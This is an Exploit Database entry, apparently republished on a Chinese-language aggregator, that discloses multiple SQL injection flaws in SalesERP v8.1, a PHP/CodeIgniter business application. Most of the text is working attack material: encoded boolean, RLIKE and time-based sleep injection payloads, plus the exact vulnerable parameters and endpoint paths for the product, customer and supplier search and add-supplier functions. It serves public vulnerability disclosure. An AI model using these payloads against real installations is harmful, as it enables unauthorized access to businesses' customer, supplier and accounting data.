Sales ERP 8.1 – Multiple SQL Injection

• Exploit Database
• 13 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46840/

• ===========================================================================================
  # Exploit Title: SalesERP v.8.1 SQL Inj.
  # Dork: N/A
  # Date: 13-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
  # Version: v8.1
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: ERP is a Modern and responsvie small Business
  management system.
  It is developed by PHP and Codeginiter framework. It is design and develop
  for thinking shop,
  small business, company and any types of business.Here has accounting,
  management, invoice,user and data analysis.
  ===========================================================================================
  # POC - SQLi
  # Parameters : customer_id, product_id
  # Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
  # POST Method :
  http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL
  Inject Here]
  # POST Method :
  http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: SalesERP v.8.1 SQL Inj.
  # Dork: N/A
  # Date: 13-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/category/php-scripts?term=sales%20erp
  # Version: v8.1
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: ERP is a Modern and responsvie small Business
  management system.
  It is developed by PHP and Codeginiter framework. It is design and develop
  for thinking shop,
  small business, company and any types of business.Here has accounting,
  management, invoice,user and data analysis.
  ===========================================================================================
  # POC - SQLi
  # Parameters : supplier_name
  # Attack Pattern :
  %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
  # POST Method :
  http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: SalesERP v.8.1 SQL Inj.
  # Dork: N/A
  # Date: 13-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/category/php-scripts?term=sales%20erp
  # Version: v8.1
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: ERP is a Modern and responsvie small Business
  management system.
  It is developed by PHP and Codeginiter framework. It is design and develop
  for thinking shop,
  small business, company and any types of business.Here has accounting,
  management, invoice,user and data analysis.
  ===========================================================================================
  # POC - SQLi
  # Parameters : supplier_name
  # Attack Pattern : 1260781%27 oR
  if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
  # POST Method :
  http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT
  INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
  ===========================================================================================